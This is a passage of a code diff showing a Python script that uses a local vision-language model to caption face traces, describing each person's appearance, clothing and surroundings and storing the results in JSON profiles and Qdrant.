profile_path = trace_path / "trace_profile.json"
|
||||
|
||||
if not profile_path.exists():
|
||||
print(f"[vlm] No trace_profile.json in {trace_dir}", file=sys.stderr)
|
||||
return {}
|
||||
|
||||
# Load existing profile
|
||||
with open(profile_path, "r") as f:
|
||||
profile = json.load(f)
|
||||
|
||||
# Find image to analyze (prefer key_frame.jpg for full context)
|
||||
key_frame = trace_path / "key_frame.jpg"
|
||||
key_face = trace_path / "key_face.jpg"
|
||||
|
||||
if not key_frame.exists() and not key_face.exists():
|
||||
print(f"[vlm] No key_frame.jpg or key_face.jpg in {trace_dir}", file=sys.stderr)
|
||||
return profile
|
||||
|
||||
# Use key_frame for clothing/background analysis (full body context)
|
||||
image_to_analyze = str(key_frame) if key_frame.exists() else str(key_face)
|
||||
|
||||
print(f"[vlm] Analyzing {trace_path.name}...")
|
||||
|
||||
# Prompt 1: Person description
|
||||
desc_prompt = "Describe this person briefly. Include: gender, age range, hair, visible clothing. If uncertain, say 'unknown'. Be concise and honest."
|
||||
description = call_vlm(image_to_analyze, desc_prompt, model)
|
||||
|
||||
# Prompt 2: Clothing details
|
||||
clothing_prompt = "Describe this person's clothing in detail. Include colors, type of clothing, any visible text or logos. If unclear, say 'unclear' or 'partially visible'. Do not guess."
|
||||
clothing = call_vlm(image_to_analyze, clothing_prompt, model)
|
||||
|
||||
# Prompt 3: Tags
|
||||
tags_prompt = "List 5 tags describing this person's appearance, comma-separated. Only include what you can clearly see. Examples: man, glasses, red-shirt, formal, casual."
|
||||
tags_raw = call_vlm(image_to_analyze, tags_prompt, model)
|
||||
tags = [t.strip() for t in tags_raw.replace(",", " ").split() if t.strip()][:5]
|
||||
|
||||
# Prompt 5: Objects in hand
|
||||
hand_prompt = "What is this person holding in their hands? Answer: object names if clearly visible, or 'nothing visible', or 'unclear'. Do not guess."
|
||||
hand_objects = call_vlm(image_to_analyze, hand_prompt, model)
|
||||
|
||||
# Prompt 6: Lighting (day/night)
|
||||
light_prompt = "What is the lighting condition? Answer one word: day, night, indoor-light, mixed, or unknown. If uncertain, answer 'unknown'."
|
||||
lighting = call_vlm(image_to_analyze, light_prompt, model).lower().strip()
|
||||
|
||||
# Prompt 7: Scene classification
|
||||
scene_prompt = "Classify the scene. Answer in JSON: {\"location\": \"indoor/outdoor/unknown\", \"weather\": \"sunny/cloudy/rainy/night/unknown\", \"setting\": \"office/street/home/nature/studio/unknown\", \"transportation\": \"car/train/bus/none/unknown\"}. Use 'unknown' if uncertain."
|
||||
scene_raw = call_vlm(image_to_analyze, scene_prompt, model)
|
||||
|
||||
# Parse scene JSON (handle markdown code blocks)
|
||||
scene_data = {}
|
||||
try:
|
||||
# Remove markdown code blocks if present
|
||||
scene_clean = scene_raw.replace("```json", "").replace("```", "").strip()
|
||||
scene_data = json.loads(scene_clean)
|
||||
except:
|
||||
scene_data = {}
|
||||
|
||||
# Prompt 8: Background description
|
||||
bg_prompt = "Describe the background and environment briefly. Include only what is clearly visible. If uncertain about details, say 'unclear' or 'partially visible'. Do not guess or imagine."
|
||||
background = call_vlm(image_to_analyze, bg_prompt, model)
|
||||
|
||||
# Prompt 9: Plants detection
|
||||
plants_prompt = "What plants, trees, or flowers are clearly visible? Answer in JSON: {\"has_plants\": true/false, \"plants\": [\"list recognizable plants by name. If not recognizable, describe briefly what you see. Use empty list if none or uncertain.\"]}"
|
||||
plants_raw = call_vlm(image_to_analyze, plants_prompt, model)
|
||||
|
||||
# Parse plants JSON
|
||||
plants_data = {}
|
||||
try:
|
||||
plants_clean = plants_raw.replace("```json", "").replace("```", "").strip()
|
||||
plants_data = json.loads(plants_clean)
|
||||
except:
|
||||
plants_data = {"has_plants": False, "plants": []}
|
||||
|
||||
# Prompt 10: Animals detection
|
||||
animals_prompt = "What animals are clearly visible? Answer in JSON: {\"has_animals\": true/false, \"animals\": [\"list recognizable animals by name. If not recognizable, describe briefly what you see. Use empty list if none or uncertain.\"]}"
|
||||
animals_raw = call_vlm(image_to_analyze, animals_prompt, model)
|
||||
|
||||
# Parse animals JSON
|
||||
animals_data = {}
|
||||
try:
|
||||
animals_clean = animals_raw.replace("```json", "").replace("```", "").strip()
|
||||
animals_data = json.loads(animals_clean)
|
||||
except:
|
||||
animals_data = {"has_animals": False, "animals": []}
|
||||
|
||||
# Prompt 11: Background tags
|
||||
bg_tags_prompt = "List 5 tags for the background/scene, comma-separated. Examples: office, street, sunny, building, car, trees."
|
||||
bg_tags_raw = call_vlm(image_to_analyze, bg_tags_prompt, model)
|
||||
bg_tags = [t.strip() for t in bg_tags_raw.replace(",", " ").split() if t.strip()][:5]
|
||||
|
||||
# Update profile
|
||||
profile["vlm_description"] = description
|
||||
profile["vlm_clothing"] = clothing
|
||||
profile["vlm_tags"] = tags
|
||||
profile["vlm_hand_objects"] = hand_objects
|
||||
profile["vlm_lighting"] = lighting
|
||||
profile["vlm_location"] = scene_data.get("location", "unknown")
|
||||
profile["vlm_weather"] = scene_data.get("weather", "unknown")
|
||||
profile["vlm_setting"] = scene_data.get("setting", "unknown")
|
||||
profile["vlm_transportation"] = scene_data.get("transportation", "unknown")
|
||||
profile["vlm_has_plants"] = plants_data.get("has_plants", False)
|
||||
profile["vlm_plants"] = plants_data.get("plants", [])
|
||||
profile["vlm_has_animals"] = animals_data.get("has_animals", False)
|
||||
profile["vlm_animals"] = animals_data.get("animals", [])
|
||||
profile["vlm_background"] = background
|
||||
profile["vlm_bg_tags"] = bg_tags
|
||||
profile["vlm_model"] = model
|
||||
|
||||
# Save updated profile
|
||||
with open(profile_path, "w") as f:
|
||||
json.dump(profile, f, indent=2)
|
||||
|
||||
# Store to Qdrant
|
||||
if store_qdrant:
|
||||
file_uuid = profile.get("file_uuid", "")
|
||||
trace_id = profile.get("trace_id", 0)
|
||||
if file_uuid:
|
||||
qdrant_api_key = os.environ.get("QDRANT_API_KEY")
|
||||
store_to_qdrant(profile, file_uuid, trace_id, qdrant_api_key=qdrant_api_key)
|
||||
|
||||
print(f"[vlm] Updated {trace_path.name}: {description[:30]}... | Loc: {scene_data.get('location', '?')} | Light: {lighting} | Hand: {hand_objects[:20]}...")
|
||||
|
||||
return profile
|
||||
|
||||
|
||||
def analyze_all_traces(file_uuid: str, output_dir: str, model: str = "llava:7b") -> dict:
|
||||
"""
|
||||
Analyze all traces for a file.
|
||||
|
||||
Returns:
|
||||
Summary dict
|
||||
"""
|
||||
file_dir = Path(output_dir) / file_uuid
|
||||
|
||||
if not file_dir.exists():
|
||||
print(f"No trace directory: {file_dir}", file=sys.stderr)
|
||||
return {"error": "No trace directory"}
|
||||
|
||||
trace_dirs = sorted(file_dir.glob("trace_*"))
|
||||
|
||||
if not trace_dirs:
|
||||
print(f"No traces found in {file_dir}", file=sys.stderr)
|
||||
return {"error": "No traces"}
|
||||
|
||||
results = []
|
||||
for trace_dir in trace_dirs:
|
||||
profile = analyze_trace(str(trace_dir), model)
|
||||
if profile:
|
||||
results.append({
|
||||
"trace_id": profile.get("trace_id"),
|
||||
"vlm_description": profile.get("vlm_description", "")[:50] + "...",
|
||||
"vlm_tags": profile.get("vlm_tags", []),
|
||||
})
|
||||
|
||||
return {
|
||||
"file_uuid": file_uuid,
|
||||
"total_traces": len(trace_dirs),
|
||||
"analyzed": len(results),
|
||||
"traces": results,
|
||||
}
|
||||
|
||||
|
||||
def main():
|
||||
parser = argparse.ArgumentParser(description="VLM caption generation for face traces")
|
||||
parser.add_argument("--trace-dir", "-t", help="Single trace directory")
|
||||
parser.add_argument("--file-uuid", "-u", help="File UUID (analyze all traces)")
|
||||
parser.add_argument("--trace-id", type=int, help="Single trace ID (requires --file-uuid)")
|
||||
parser.add_argument("--output-dir", "-o", default="/Users/accusys/momentry/output", help="Output directory")
|
||||
parser.add_argument("--model", "-m", default="llava:7b", help="VLM model name")
|
||||
parser.add_argument("--json", "-j", action="store_true", help="Output as JSON")
|
||||
args = parser.parse_args()
|
||||
|
||||
if args.trace_dir:
|
||||
# Single trace directory
|
||||
result = analyze_trace(args.trace_dir, args.model)
|
||||
elif args.file_uuid:
|
||||
if args.trace_id is not None:
|
||||
# Single trace
|
||||
trace_dir = Path(args.output_dir) / args.file_uuid / f"trace_{args.trace_id}"
|
||||
result = analyze_trace(str(trace_dir), args.model)
|
||||
else:
|
||||
# All traces for file
|
||||
result = analyze_all_traces(args.file_uuid, args.output_dir, args.model)
|
||||
else:
|
||||
parser.error("Requires --trace-dir or --file-uuid")
|
||||
|
||||
if args.json:
|
||||
print(json.dumps(result, indent=2))
|
||||
else:
|
||||
if "vlm_description" in result:
|
||||
print(f"Description: {result['vlm_description']}")
|
||||
print(f"Clothing: {result.get('vlm_clothing', '')}")
|
||||
print(f"Tags: {result.get('vlm_tags', [])}")
|
||||
|
||||
|
||||
if __name__ == "__main__":
|
||||
main()
|
||||
@@ -483,6 +483,7 @@ if __name__ == "__main__":
|
||||
action="store_true",
|
||||
help="Force restart from beginning (ignore existing data)",
|
||||
)
|
||||
parser.add_argument("--frames", type=str, default=None, help=argparse.SUPPRESS)
|
||||
|
||||
args = parser.parse_args()
|
||||
|
||||
|
||||
Reference in New Issue
Block a user